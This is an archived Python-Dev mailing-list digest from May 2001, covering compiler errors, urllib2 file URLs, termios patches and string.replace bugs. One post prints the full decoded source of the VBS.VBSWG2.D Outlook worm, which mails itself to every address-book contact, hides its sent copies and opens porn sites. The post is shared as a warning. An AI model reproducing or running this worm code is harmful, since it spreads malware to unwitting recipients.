sure that all of that is devoted to including the right headers. can-we-just-have-TERMIOS-back?-ly y'rs M. -- Good? Bad? Strap him into the IETF-approved witch-dunking apparatus immediately! -- NTK now, 21/07/2000 From tim.one at home.com Wed May 9 08:48:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 02:48:12 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <20010508133638.Z16486@xs4all.nl> Message-ID: [Tim] > Given the new dict iterators in 2.2, there's an easier fast way > that doesn't mutate the dict even under the covers: > > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") [Thomas Wouters] > You probably want: > > arb = dict.iteritems().next > > so that you don't keep on returning the same key,value pair. No, I would not want that. If "arbitrary" suffices, then by defn. *any* element is "good enough". If it's not good enough to get the same one back every time, then I want a stronger guarantee about what arb() returns than the inexplicable behavior of repeated calls to dict.iteritems().next in the presence of dict mutation. But as I've said several times before , I'm still asking for an algorithm where arb() is actually useful (as opposed to .popitem(), which is dead easy to explain in the presence of mutation; your version of arb() can, e.g., return a given entry more than once, may skip entries, and may raise StopIteration with unexamined entries remaining in the dict). not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly y'rs - tim From tim.one at home.com Wed May 9 09:42:00 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 03:42:00 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au> Message-ID: [Mark Favas] > Changes in the last few hours (hi Tim!) Hi Mark! Sorry about that! > to stringobject compile (I'd guess) on MS You guess right -- and under two flavors of Windows . > (and on Compaq's Tru64 compiler), Figures. > but produce the following with gcc on Solaris and FreeBSD: > > gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include > -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c > Objects/stringobject.c: In function `PyString_FromStringAndSize': > Objects/stringobject.c:76: invalid lvalue in unary `&' > Objects/stringobject.c:80: invalid lvalue in unary `&' > Objects/stringobject.c: In function `PyString_FromString': > Objects/stringobject.c:130: invalid lvalue in unary `&' > Objects/stringobject.c:134: invalid lvalue in unary `&' > *** Error code 1 Fair enough: I tried to use a cast as an lvalue in those 4 places, all of the form: PyString_InternInPlace(&(PyObject *)op); where op is declared PyStringObject*. Strictly speaking, that ain't legal, but changing it to: PyObject *t = (PyObject *)op; PyString_InternInPlace(&t); is. You may wonder WTF the difference is. That's easy: the rewrite doesn't use a cast expression as an lvalue . sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs - tim From jack at oratrix.nl Wed May 9 10:16:29 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 09 May 2001 10:16:29 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by , Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl> > > Jack> It's actually 830 files. ... 120 .c/.h files ... > > How many of those 120 files are variants of existing source files that (in > theory) could be merged with their mainline counterparts? None (unless you would count macmodule.c as a variant of posixmodule.c). I think macmain.c started out as a clone of pythonmain.c, but I think they're too different to merge (but I'll have a look). Hmm, now that I think of it macmodule and posixmodule could possibly be merged. It's fun to see how much statistics I gather about MacPython in just a few days:-) -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From tim.one at home.com Wed May 9 10:20:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 04:20:12 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: <20010508070501.A25794@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Shouldn't the entry in the __future__ file be: > > nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) > > or am I misunderstanding something? Until nested_scopes *is* the rule, the Mandatory Release field is just a guess about the future. Changing it to (2, 2, 0, "alpha", 0) right *now* would be wrong, since it would change it from a guess about the future to a false statement about the present. It must be changed when nested_scopes become mandatory; it needn't be changed before then (unless we delay making them mandatory beyond 2.2 final), although if somebody thinks they have a good use for moving the guess up, fine, just so long as they don't move the guess to or before 2.2a0. From thomas at xs4all.net Wed May 9 10:58:50 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 10:58:50 +0200 Subject: [Python-Dev] Crashes w/ CVS tree Message-ID: <20010509105850.F16486@xs4all.nl> I'm getting a crash with Python compiled from a freshly updated CVS tree, even when running just './python'. It crashes during the loading of os.pyc. It doesn't crash if I start python with -S, and it doesn't crash if I remove *.pyc first: centurion:~/python/python-2.2/dist/src/linux> ./python Python 2.2a0 (#4, May 9 2001, 09:52:29) [GCC 2.95.4 20010506 (Debian prerelease)] on linux2 Type "copyright", "credits" or "license" for more information. >>> centurion:~/python/python-2.2/dist/src/linux> ./python Segmentation fault If I remove os.pyc only, I get the enlightning: Fatal Python error: PyString_InternInPlace: strings only please! Abort (core dumped) I would blame Tim , except that when examining the corefile I found some pointers to other causes. The 'original' crash occurs because cmp_outcome() is passed an invalid PyObject, with most of its function slots pointing to the middle of the glibc-internal '__morecore()' function. Examining the stack off of which the invalid item was popped reveals that the next-to-last item is an iterator. So maybe I should blame Guido instead, either for the iterator or for rich comparisons ;) From thomas at xs4all.net Wed May 9 11:14:32 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 11:14:32 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112 In-Reply-To: ; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700 References: <20010509105850.F16486@xs4all.nl> Message-ID: <20010509111432.G16486@xs4all.nl> On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Objects > In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects > > Modified Files: > stringobject.c > Log Message: > Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to > restore correct semantics. This apparently fixed my problem: On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote: > > I'm getting a crash with Python compiled from a freshly updated CVS tree, > even when running just './python'. It crashes during the loading of os.pyc. > It doesn't crash if I start python with -S, and it doesn't crash if I remove > *.pyc first: That ought to teach me to spend my morning doing something fun -- it turned out to be useless :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Wed May 9 11:29:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 05:29:31 -0400 Subject: [Python-Dev] Crashes w/ CVS tree In-Reply-To: <20010509105850.F16486@xs4all.nl> Message-ID: [Thomas Wouters] > I'm getting a crash with Python compiled from a freshly updated CVS > tree,even when running just './python'. I did too, for a little while, but it's gone away. > ... > Fatal Python error: PyString_InternInPlace: strings only please! > Abort (core dumped) > > I would blame Tim , I would too. Please update, and if stringobject.c changes, try again. I'm sure this is my fault, but I'm too sleepy to figure out why, and I did change *something* at random that appeared to make it go away . it's-all-gcc's-fault-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 17:49:29 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 11:49:29 -0400 Subject: [Python-Dev] Homepage Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Hi! You've got to see this page! It's really cool ;O) -------------- next part -------------- A non-text attachment was scrubbed... Name: homepage.HTML.vbs Type: application/octet-stream Size: 2419 bytes Desc: not available URL: From guido at digicool.com Wed May 9 19:08:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 12:08:22 -0500 Subject: [Python-Dev] Homepage In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400." <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Greg Wilson's computer was infected by a virus which got propagated to python-dev. Do NOT open the attachment! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at pythonware.com Wed May 9 18:12:00 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 9 May 2001 18:12:00 +0200 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid> Greg's mail program wrote: > Hi! > > You've got to see this page! It's really cool ;O) > Content-Type: application/octet-stream; > name="homepage.HTML.vbs" > Content-Transfer-Encoding: quoted-printable > Content-Disposition: attachment; > filename="homepage.HTML.vbs" when will we see the first "homepage.HTML.py" virus? Cheers /F From esr at thyrsus.com Wed May 9 18:20:24 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 9 May 2001 12:20:24 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500 References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <20010509122024.A416@thyrsus.com> Guido van Rossum : > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Some of us -- heh, heh -- aren't vulnerable to attachment trojans. I could almost (not quite, but almost) love the crackers and script kiddiez of the world for what they're doing to Microsoft... -- Eric S. Raymond We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time. -- T.S. Eliot From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:21:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:21:27 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update of the maintenance branch (for Python 2.1.1). From barry at digicool.com Wed May 9 18:23:26 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 9 May 2001 12:23:26 -0400 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <15097.28414.354061.170478@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Greg Wilson's computer was infected by a virus which got GvR> propagated to python-dev. Do NOT open the attachment! Darn, and I was just finishing up the vbs.el script so my XEmacs/VM reader could open it. share-the-pain-share-the-fun-ly y'rs, -Barry From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:47:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:47:27 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update of the development branch (for Python 2.2). From pedroni at inf.ethz.ch Wed May 9 19:12:20 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST) Subject: [Python-Dev] Homepage Message-ID: <200105091712.TAA05172@core.inf.ethz.ch> Hi. [GvR] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Here's the beast ("decrypted" and in a cage): ("decrypted" and in a cage): (we got it also on the old jpython-interest) MS has really increased computer usability, when I was younger (and I'm not that old) one bad guy had to use assembler to cause some damage, now thanks to MS, that don't cares much about security but likely a lot about self-confindence, everybody can feel very clever and proud writing such things ... and spamming the whole internet. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm") elseif r=2 Then WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm") elseif r=3 Then WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm") ElseIf r=4 Then WS.Run("http://sheila.issexy.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vb$" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function PS: the "decryption" was done in python ;) From tim.one at home.com Wed May 9 19:47:22 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 13:47:22 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Note that the same virus went out under the name of John G. Michopoulos on the JPython (not Jython!) mailing list. Here's detailed info on the virus (incl. simple removal instructions if you got bit): http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d at mm.html Doesn't appear to be worse than a nuisance. Anyone who has used Windows Update within the last year and installed the "critical updates" it recommends should have gotten a popup box warning that the attachment was trying to access the Address Book, telling you it's probably a virus, and advising to accept the "No, don't allow this" default. you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 20:50:25 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 14:50:25 -0400 Subject: [Python-Dev] apology Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com> My apologies to all --- yes, my machine was hit by a virus that flooded the known universe with email. Sorry for any grief it has caused anyone, Greg From tim.one at home.com Wed May 9 21:30:41 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 15:30:41 -0400 Subject: [Python-Dev] test_urllib2 fails on Win98SE Message-ID: test_urliib2 takes > 30 seconds, then fails: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file if not host or \ socket.error: host not found The URL it's passing is file://c:\code\python\dist\src\lib\urllib2.pyc If I change test_urllib2's file_url = "file://%s" % urllib2.__file__ to (adding another slash) file_url = "file:///%s" % urllib2.__file__ then it fails like this instead, but very quickly: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file return addinfourl(open(url2pathname(file), 'rb'), IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc' Here's what I know about URLs: . Here's what I know about file URLs: . Here's what I know about file URLs on Windows: . If I type the original file://c:\code\python\dist\src\lib\urllib2.pyc into IE's address bar, it actually *executes* urllib2. From mwh at python.net Wed May 9 21:50:34 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 20:50:34 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700" References: Message-ID: "Fred L. Drake" writes: > ! fd = PyObject_AsFileDescriptor(obj); > ! if (fd == -1) { > ! if (PyInt_Check(obj)) { ^^^^^^^^^^^^^^^^ this is a bit pointless. I admit ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? TypeError: tcgetattr, arg 1: can't extract file descriptor from "int" is a bit confusing, but I'm not sure ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? error: (9, 'Bad file descriptor') is any better than: ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? ValueError: file descriptor cannot be a negative integer (-2) which is what you get after applying this patch: Index: Modules/termios.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v retrieving revision 2.26 diff -c -r2.26 termios.c *** Modules/termios.c 2001/05/09 17:53:06 2.26 --- Modules/termios.c 2001/05/09 19:49:52 *************** *** 37,43 **** fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! fd = PyInt_AS_LONG(obj); } else { char* tname; --- 37,43 ---- fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! return 0; } else { char* tname; Cheers, M. From fdrake at acm.org Wed May 9 22:09:09 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 9 May 2001 16:09:09 -0400 (EDT) Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: References: Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Michael Hudson writes: > this is a bit pointless. You're right! (Hey, it was your patch. ;) I'm checking in a different patch -- essentially, PyObject_AsFileDescriptor() does the right thing, and we don't ever need to second guess it. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 9 22:13:46 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:13:46 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > I've attached the patch. Due to a small reorganisation the patch is > a little longer -- symmetry has its price at C level too ;-) I may be being dense, but can you explain what's going on here: ->> u'\u00e3'.encode('latin-1') '\xe3' ->> u'\u00e3'.encode("latin-1").decode("latin-1") Traceback (most recent call last): File "", line 1, in ? UnicodeError: ASCII encoding error: ordinal not in range(128) Can you come up with some other example I can use it tomorrow's python-dev summary? Cheers, M. -- Remember - if all you have is an axe, every problem looks like hours of fun. -- Frossie -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html From mwh at python.net Wed May 9 22:18:47 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:18:47 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 References: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > this is a bit pointless. > > You're right! (Hey, it was your patch. ;) So it was! I must have uploaded a slightly stale version of the patch, because I noticed this when cvs update conflicted with what I had in Modules/termios.c... oops. > I'm checking in a different patch -- essentially, > PyObject_AsFileDescriptor() does the right thing, and we don't ever > need to second guess it. I was a bit concerned that the error should contain the function name. On reflection, I agree that the code is so much simpler that it's a win. Cheers, M. -- Java sucks. [...] Java on TV set top boxes will suck so hard it might well inhale people from off their sofa until their heads get wedged in the card slots. --- Jon Rabone, ucam.chat From paulp at ActiveState.com Wed May 9 22:48:38 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Wed, 09 May 2001 13:48:38 -0700 Subject: [Python-Dev] test_urllib2 fails on Win98SE References: Message-ID: <3AF9AD26.AC6DD323@ActiveState.com> Tim Peters wrote: > >... > > Here's what I know about file URLs on Windows: . We constantly run into these problems with Komodo. The long and short is that file URL handling on Windows is totally different than on Unix and platform-specific code is probably appropriate. Here's what I know: IE treats the following equivalently: c:\temp\diff.txt file:c:\temp\diff.txt file:/c:\temp\diff.txt file://c:\temp\diff.txt file:///c:\temp\diff.txt file:///////////////////////////////c:\temp\diff.txt You can also reverse backslashes to slashes and slashes to backslashes if you like. Interestingly, though, UNC paths seem to work okay (no matter how you do the slashes and backslashes): file://americano\home\paulp\foo.html UNC paths seem to only allow two leading slashes/backslashes. Truly this is a new level of "be liberal in what you accept". The algorithm is probably something like: 1. normalize to forward slashes. 2. Remove "file:". 3. What you have left should be of the form: //machine/path or (/*)x:/path Where x is the drive letter. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From fredrik at effbot.org Thu May 10 01:19:40 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 10 May 2001 01:19:40 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> tim wrote: > Modified Files: > stropmodule.c > Log Message: > SF bug #422088: [OSF1 alpha] string.replace(). > Platform blew up on "123".replace("123", ""). Michael Hudson pinned the > blame on platform malloc(0) returning NULL. any reason why the #ifdef MALLOC_ZERO_RETURNS_NULL macro (in pyport.h) isn't set / doesn't take care of this? (and is it just me, or does the strop.replace function allocate a buffer, copy the result to that buffer, only to copy it into a string and throw the buffer away? no wonder u"".replace() is 30% faster than "".replace() ;-) Cheers /F From tim at digicool.com Thu May 10 01:39:08 2001 From: tim at digicool.com (Tim Peters) Date: Wed, 9 May 2001 19:39:08 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> Message-ID: [Fredrik Lundh] > any reason why the > > #ifdef MALLOC_ZERO_RETURNS_NULL > > macro (in pyport.h) isn't set / doesn't take care of this? The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up being plain malloc. As Michael noted in the bug report, it could have used PyMem_Malloc() instead and avoided the problem. But I chose not to do that, since special-casing a result of 0 was more efficient for reasons other than malloc. However: > (and is it just me, or does the strop.replace function allocate > a buffer, copy the result to that buffer, only to copy it into a > string and throw the buffer away? Yes. And I'm returning something now that musn't be free()'ed when the result length is 0. Will fix. > no wonder u"".replace() is 30% faster than "".replace() ;-) For a given number of characters or bytes ? From tim.one at home.com Thu May 10 01:46:13 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 19:46:13 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Message-ID: Oh, fuck. Somebody remind me why we have both stropmodule.c and stringobject.c? These bugs exist in both. From mike.mellor at tbe.com Thu May 10 02:16:28 2001 From: mike.mellor at tbe.com (mike.mellor at tbe.com) Date: Thu, 10 May 2001 00:16:28 -0000 Subject: [Python-Dev] CygWin and Tkinter Message-ID: <9dcmks+6aqf@eGroups.com> I am playing around with CygWin (which came with Pyhton 2.1 installed). While I can run command line programs, Tkinter is not part of the package. TCL/TK is installed and I have been able to build TK GUI's. How can I get Tkinter added to my Python package? Thanks. Mike From tim.one at home.com Thu May 10 02:47:52 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 20:47:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior Message-ID: test_strop.py contains this line: test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0) string_tests.py has this: test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) IOW, the test suite insists that strop.replace('one!two!three!', '!', '@', 0) replace all matches but that string.replace('one!two!three!', '!', '@', 0) and 'one!two!three!'.replace('!', '@', 0) replace nothing. I've been thrashing like a madman trying to fix a common bug in both modules (in out-of-synch copies of mymemreplace), and every time I think I fix something "the other" module breaks. The above appears to be why. My opinion: the test_strop.py test is in error, and so was strop_replace() in stropmodule.c. I'm checking in changes accordingly, but won't mind getting yelled at if you disagree. From greg at cosc.canterbury.ac.nz Thu May 10 02:56:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 10 May 2001 12:56:12 +1200 (NZST) Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Tim Peters : > PyObject *t = (PyObject *)op; > PyString_InternInPlace(&t); If you want to keep it all on one line, you could try PyString_InternInPlace((PyObject **)&op); Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Thu May 10 04:00:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:00:36 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400." References: Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> > Oh, fuck. Somebody remind me why we have both stropmodule.c and > stringobject.c? These bugs exist in both. In my mind, strop is obsolete. We keep it around because some losers like to import it directly, but it's basically dead, and except for a few functions, string.py doesn't use it any more. (The exceptions are maketrans, lowercase, uppercase, whitespace.) --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 04:01:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:01:20 -0500 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT." <9dcmks+6aqf@eGroups.com> References: <9dcmks+6aqf@eGroups.com> Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com> > I am playing around with CygWin (which came with Pyhton 2.1 > installed). While I can run command line programs, Tkinter is not > part of the package. TCL/TK is installed and I have been able to > build TK GUI's. How can I get Tkinter added to my Python package? > Thanks. Beats me. Ask whoever produces the CygWin port. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:07:40 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:07:40 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Message-ID: >> PyObject *t = (PyObject *)op; >> PyString_InternInPlace(&t); [Greg Ewing] > If you want to keep it all on one line, you could try > > PyString_InternInPlace((PyObject **)&op); op is declared "register" so it's not strictly legal to apply the address-of operator to it regardless. Besides, Guido pays me by the line . or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly y'rs - tim From gward at python.net Thu May 10 03:08:58 2001 From: gward at python.net (Greg Ward) Date: Wed, 9 May 2001 21:08:58 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500 References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: <20010509210858.A3467@gerg.ca> On 09 May 2001, Guido van Rossum said: > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) Perhaps 2.2 should deprecate direct use of strop noisily -- warn when imported, except when imported by string.py. (No idea how you'd implement that, I'm just spouting off.) Then it could go away in 2.3. I don't think there's anything particularly controversial about 'strop' going away after one release with a deprecation warning -- it's not 'string', after all! (Ie. imported by every single scrap of Python code ever written before string methods came along, and by quite a lot since then.) Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ I joined scientology at a garage sale!! From guido at digicool.com Thu May 10 04:12:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:12:55 -0500 Subject: [Python-Dev] Inconsistent 